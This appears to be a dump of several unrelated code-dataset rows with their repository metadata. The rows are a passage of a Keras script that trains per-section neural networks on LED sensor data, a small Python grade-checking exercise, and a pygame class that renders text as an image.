pat2NumberOfHiddenUnits = pat2LayerOfHiddenUnits + "\\{} Hidden First".format(TrainingParam["FirstLayerHiddenUnits"])
# Create the folder if it has not been previously created
if not os.path.exists(pat2NumberOfHiddenUnits):
os.makedirs(pat2NumberOfHiddenUnits)
# At the weight destination file path, create a folder for the current section to store its weight file
pat2SectionFold = pat2NumberOfHiddenUnits + "\\Section {}".format(section+1)
# Create the folder if it has not been previously created
if not os.path.exists(pat2SectionFold):
os.makedirs(pat2SectionFold)
# For each section, record the file from which the training data is obtained and the columns indeces used for training the data
f = open(pat2SectionFold + "\\SectionInformation.txt", "a")
f.write("Currently in section {}, Csv file used for training is {}, The indeces used for training are {}".format(section,TrainingParam["Path2i690TrainingData"],[i+2 for i in range ((section*pxlShift),(section*pxlShift)+TrainingParam["InputPerSection"])]))
f.close()
# Construct the path to save the weight file
pat2Weight = pat2SectionFold + "\\i690{}Section{}.h5".format(section+1,section+1)
# Based on the selected metrics, instantaite a new metrics class for every section
if TrainingParam["Loss"] == "MAP Error":
loss = keras.losses.MeanAbsolutePercentageError()
metrics = keras.metrics.MeanAbsolutePercentageError()
callbackMonitorQuality = "val_mean_absolute_percentage_error"
elif TrainingParam["Loss"] == "MS Error":
loss = keras.losses.MeanSquaredError()
metrics = keras.metrics.MeanSquaredError()
callbackMonitorQuality = "val_mean_squared_error"
# Checkpoint to save the best weights
checkpoint_callback = keras.callbacks.ModelCheckpoint(
filepath=pat2Weight,
save_weights_only=True,
verbose = 1,
monitor=callbackMonitorQuality,
mode='min',
save_best_only=True)
# Create the model
tempMod = SingleLayerNeuralNet(InputsPerSection=TrainingParam["InputPerSection"],HiddenUnits=TrainingParam["FirstLayerHiddenUnits"],Activation=TrainingParam["Activation"],Optimizer=keras.optimizers.Adam(lr=0.01),Loss=loss,Metrics=metrics,NoOutput=TrainingParam["NoOfOutput"])
else:
# Path to folder for different layers of hidden units
pat2LayerOfHiddenUnits = pat2NumberOfOverlap + "\\TwoHidden"
# Create the folder if it has not been previously created
if not os.path.exists(pat2LayerOfHiddenUnits):
os.makedirs(pat2LayerOfHiddenUnits)
# Path to folder containing the number of hidden units
pat2NumberOfHiddenUnits = pat2LayerOfHiddenUnits + "\\{} First {} Second".format(TrainingParam["FirstLayerHiddenUnits"],TrainingParam["SecondLayerHiddenUnits"])
# Create the folder if it has not been previously created
if not os.path.exists(pat2NumberOfHiddenUnits):
os.makedirs(pat2NumberOfHiddenUnits)
# At the weight destination file path, create a folder for the current section to store its weight file
pat2SectionFold = pat2NumberOfHiddenUnits + "\\Section {}".format(section+1)
# Create the folder if it has not been previously created
if not os.path.exists(pat2SectionFold):
os.makedirs(pat2SectionFold)
# For each section, record the file from which the training data is obtained and the columns indeces used for training the data
f = open(pat2SectionFold + "\\SectionInformation.txt", "a")
f.write("Currently in section {}, Csv file used for training is {}, The indeces used for training are {}".format(section,TrainingParam["Path2i690TrainingData"],[i+2 for i in range ((section*pxlShift),(section*pxlShift)+TrainingParam["InputPerSection"])]))
f.close()
# Construct the path to save the weight file
pat2Weight = pat2SectionFold + "\\i690{}Section{}.h5".format(section+1,section+1)
# Based on the selected metrics, instantaite a new metrics class for every section
if TrainingParam["Loss"] == "MAP Error":
loss = keras.losses.MeanAbsolutePercentageError()
metrics = keras.metrics.MeanAbsolutePercentageError()
callbackMonitorQuality = "val_mean_absolute_percentage_error"
elif TrainingParam["Loss"] == "MS Error":
loss = keras.losses.MeanSquaredError()
metrics = keras.metrics.MeanSquaredError()
callbackMonitorQuality = "val_mean_squared_error"
# Checkpoint to save the best weights
checkpoint_callback = keras.callbacks.ModelCheckpoint(
filepath=pat2Weight,
save_weights_only=True,
verbose = 1,
monitor=callbackMonitorQuality,
mode='min',
save_best_only=True)
# Create the model
tempMod = DoubleLayerNeuralNet(InputsPerSection=TrainingParam["InputPerSection"],FirstLayerHiddenUnits=TrainingParam["FirstLayerHiddenUnits"],SecondLayerHiddenUnits=TrainingParam["SecondLayerHiddenUnits"],Activation=TrainingParam["Activation"],Optimizer=keras.optimizers.Adam(lr=0.01),Loss=loss,Metrics=metrics,NoOutput=TrainingParam["NoOfOutput"])
# Train the model
history = tempMod.model.fit(X_train,Y_train,batch_size=int(X_train.shape[0]//2),epochs=TrainingParam["Epochs"],validation_data=(X_valid,Y_valid),callbacks=[checkpoint_callback])
# Save the minimum validation error for the current section
sectErr[0,section] = min(history.history[callbackMonitorQuality])
# Clear the training session for the current section
K.clear_session()# Checked
else:
# Compute the section number for LED 2
LED2Section = ttlSection - section - 1
# Construct the input and target values for the current section
ii690Train,ii690Target = TrainNTargetValues(LED2Section,pxlShift,TrainingParam["InputPerSection"],TrainingParam["Path2ii690TrainingData"])
# Split the data into training and validation
X_train,X_valid,Y_train,Y_valid = train_test_split(ii690Train,ii690Target,test_size=0.05,random_state=3)
# Construct file path to folder specifying the type of loss function used when training
pat2TypeOfLossFunc = TrainingParam["Path2SaveWeights"] + "\\{}".format(TrainingParam["Loss"])
# Create the folder if it has not been previously created
if not os.path.exists(pat2TypeOfLossFunc):
os.makedirs(pat2TypeOfLossFunc)
# Construct file path to folder specifying the type of activation used for training
pat2ActivationType = pat2TypeOfLossFunc + "\\{}".format(TrainingParam["ActivationDisp"])
# Create the folder if it has not been previously created
if not os.path.exists(pat2ActivationType):
os.makedirs(pat2ActivationType)
# Construct the file path to the folder of the current number of pixels per section
pat2NumberOfInputPxl = pat2ActivationType + "\\{} Input".format(TrainingParam["InputPerSection"])
# Create the folder if it has not been previously created
if not os.path.exists(pat2NumberOfInputPxl):
os.makedirs(pat2NumberOfInputPxl)
# Construct the file path to the folder of the current number of overlapping pixels in between sections
pat2NumberOfOverlap = pat2NumberOfInputPxl + "\\{} Overlap".format(TrainingParam["OverlappingPixels"])
# Create the folder if it has not been previously created
if not os.path.exists(pat2NumberOfOverlap):
os.makedirs(pat2NumberOfOverlap)
# Create a temporary SNN model for training
if TrainingParam["SecondLayerHiddenUnits"] == 0:
# Path to folder for different layers of hidden units
pat2LayerOfHiddenUnits = pat2NumberOfOverlap + "\\OneHidden"
# Create the folder if it has not been previously created
if not os.path.exists(pat2LayerOfHiddenUnits):
os.makedirs(pat2LayerOfHiddenUnits)
# Path to folder containing the number of hidden units
pat2NumberOfHiddenUnits = pat2LayerOfHiddenUnits + "\\{} Hidden First".format(TrainingParam["FirstLayerHiddenUnits"])
# Create the folder if it has not been previously created
if not os.path.exists(pat2NumberOfHiddenUnits):
os.makedirs(pat2NumberOfHiddenUnits)
# At the weight destination file path, create a folder for the current section to store its weight file
pat2SectionFold = pat2NumberOfHiddenUnits + "\\Section {}".format(section+1)
# Create the folder if it has not been previously created
if not os.path.exists(pat2SectionFold):
os.makedirs(pat2SectionFold)
# For each section, record the file from which the training data is obtained and the columns indeces used for training the data
f = open(pat2SectionFold + "\\SectionInformation.txt", "a")
f.write("Currently in section {}, Csv file used for training is {}, The indeces used for training are {}".format(LED2Section,TrainingParam["Path2ii690TrainingData"],[i+2 for i in range ((LED2Section*pxlShift),(LED2Section*pxlShift)+TrainingParam["InputPerSection"])]))
f.close()
# Construct the path to save the weight file
pat2Weight = pat2SectionFold + "\\ii690{}Section{}.h5".format(LED2Section+1,section+1)
# Based on the selected metrics, instantaite a new metrics class for every section
if TrainingParam["Loss"] == "MAP Error":
loss = keras.losses.MeanAbsolutePercentageError()
metrics = keras.metrics.MeanAbsolutePercentageError()
callbackMonitorQuality = "val_mean_absolute_percentage_error"
elif TrainingParam["Loss"] == "MS Error":
loss = keras.losses.MeanSquaredError()
metrics = keras.metrics.MeanSquaredError()
callbackMonitorQuality = "val_mean_squared_error"
# Checkpoint to save the best weights
checkpoint_callback = keras.callbacks.ModelCheckpoint(
filepath=pat2Weight,
save_weights_only=True,
verbose = 1,
monitor=callbackMonitorQuality,
mode='min',
save_best_only=True)
# Create the model
tempMod = SingleLayerNeuralNet(InputsPerSection=TrainingParam["InputPerSection"],HiddenUnits=TrainingParam["FirstLayerHiddenUnits"],Activation=TrainingParam["Activation"],Optimizer=keras.optimizers.Adam(lr=0.01),Loss=loss,Metrics=metrics,NoOutput=TrainingParam["NoOfOutput"])
else:
# Path to folder for different layers of hidden units
pat2LayerOfHiddenUnits = pat2NumberOfOverlap + "\\TwoHidden"
# Create the folder if it has not been previously created
if not os.path.exists(pat2LayerOfHiddenUnits):
os.makedirs(pat2LayerOfHiddenUnits)
# Path to folder containing the number of hidden units
pat2NumberOfHiddenUnits = pat2LayerOfHiddenUnits + "\\{} First {} Second".format(TrainingParam["FirstLayerHiddenUnits"],TrainingParam["SecondLayerHiddenUnits"])
# Create the folder if it has not been previously created
if not os.path.exists(pat2NumberOfHiddenUnits):
os.makedirs(pat2NumberOfHiddenUnits)
# At the weight destination file path, create a folder for the current section to store its weight file
pat2SectionFold = pat2NumberOfHiddenUnits + "\\Section {}".format(section+1)
# Create the folder if it has not been previously created
if not os.path.exists(pat2SectionFold):
os.makedirs(pat2SectionFold)
# For each section, record the file from which the training data is obtained and the columns indeces used for training the data
f = open(pat2SectionFold + "\\SectionInformation.txt", "a")
f.write("Currently in section {}, Csv file used for training is {}, The indeces used for training are {}".format(LED2Section,TrainingParam["Path2ii690TrainingData"],[i+2 for i in range ((LED2Section*pxlShift),(LED2Section*pxlShift)+TrainingParam["InputPerSection"])]))
f.close()
# Construct the path to save the weight file
pat2Weight = pat2SectionFold + "\\ii690{}Section{}.h5".format(LED2Section+1,section+1)
# Based on the selected metrics, instantaite a new metrics class for every section
if TrainingParam["Loss"] == "MAP Error":
loss = keras.losses.MeanAbsolutePercentageError()
metrics = keras.metrics.MeanAbsolutePercentageError()
callbackMonitorQuality = "val_mean_absolute_percentage_error"
elif TrainingParam["Loss"] == "MS Error":
loss = keras.losses.MeanSquaredError()
metrics = keras.metrics.MeanSquaredError()
callbackMonitorQuality = "val_mean_squared_error"
# Checkpoint to save the best weights
checkpoint_callback = keras.callbacks.ModelCheckpoint(
filepath=pat2Weight,
save_weights_only=True,
verbose = 1,
monitor=callbackMonitorQuality,
mode='min',
save_best_only=True)
# Create the model
tempMod = DoubleLayerNeuralNet(InputsPerSection=TrainingParam["InputPerSection"],FirstLayerHiddenUnits=TrainingParam["FirstLayerHiddenUnits"],SecondLayerHiddenUnits=TrainingParam["SecondLayerHiddenUnits"],Activation=TrainingParam["Activation"],Optimizer=keras.optimizers.Adam(lr=0.01),Loss=loss,Metrics=metrics,NoOutput=TrainingParam["NoOfOutput"])
# Train the model
history = tempMod.model.fit(X_train,Y_train,batch_size=int(X_train.shape[0]//2),epochs=TrainingParam["Epochs"],validation_data=(X_valid,Y_valid),callbacks=[checkpoint_callback])
# Save the minimum validation error for the current section
sectErr[0,section] = min(history.history[callbackMonitorQuality])
# Clear the training session for the current section
K.clear_session()# Checked
#After all sections have been trained, save the error values
np.savetxt(pat2NumberOfHiddenUnits+"\\MinError.csv", sectErr, delimiter=",") | [
"noreply@github.com"
] | Zhi-Yih-Lim.noreply@github.com |
2bb65b8fa96ba90a308d56213ff899750b9f85db | 3b0c9017c88a9f1fe6c0f4312257c1f849f99a67 | /Assignment 2 - Decisions and Booleans/Grade.py | 562fb7ffa5f87659433f2e94065178784000a21d | [] | no_license | Theodora17/PROG-2019 | ac4c0e4d8e891248415589860194303b11d2eba4 | d701916295dfe1131e61f7118e79b74d64acb283 | refs/heads/master | 2020-07-19T22:38:16.754856 | 2019-09-05T11:42:38 | 2019-09-05T11:42:38 | 206,525,793 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 355 | py | grade = float(input("Input a grade: ")) # Do not change this line
# Fill in the missing code below
if grade >= 0.0 and grade <= 10.0:
if grade >= 5.0:
print("Passing grade!") # Do not change this line
elif grade <= 5.0:
print("Failing grade!") # Do not change this line
else:
print("Invalid grade!") # Do not change this line | [
"34063081+Theodora17@users.noreply.github.com"
] | 34063081+Theodora17@users.noreply.github.com |
92df8935229dd8eaf991c49b79ae9e82a8809421 | 6e133ed08b0380c513aa99624161b25311d6fc68 | /text_image.py | cdf66f6a0bce794a3bed3f0c919afbeccb8a4ae2 | [] | no_license | jamescarr0/flappy_unicorn | 75a5dc71c73036695bc92cf2443d335ae74a9f49 | 49e9e729d5c6d66cc8234626c713f03a177576ee | refs/heads/master | 2022-10-04T04:41:42.636987 | 2020-06-10T19:40:36 | 2020-06-10T19:40:36 | 270,330,775 | 0 | 0 | null | 2020-06-09T11:09:34 | 2020-06-07T14:26:36 | Python | UTF-8 | Python | false | false | 1,014 | py | import pygame
class TextImage:
"""A class to render text as an image. """
def __init__(self, screen, text, size, text_color=(237, 93, 183)):
""" Constructor. """
self.screen = screen
self.screen_rect = self.screen.get_rect()
self.text = text
self.text_color = text_color
self.font = pygame.font.Font('fonts/UnicornMagic-OVML6.ttf', size)
self.text_img = self._render_text().convert_alpha()
self.rect = self.text_img.get_rect()
self.rect.center = self.screen_rect.center
def _render_text(self, *text):
""" Render text and return an image. """
return self.font.render(self.text, True, self.text_color)
def change_position(self, width, height):
"""
(width, height)
Moves the rect in place. Starting point is center of screen.
"""
self.rect.move_ip(width, height)
def blit_me(self):
""" Blit to screen"""
self.screen.blit(self.text_img, self.rect)
| [
"jamescarr0@hotmail.com"
] | jamescarr0@hotmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.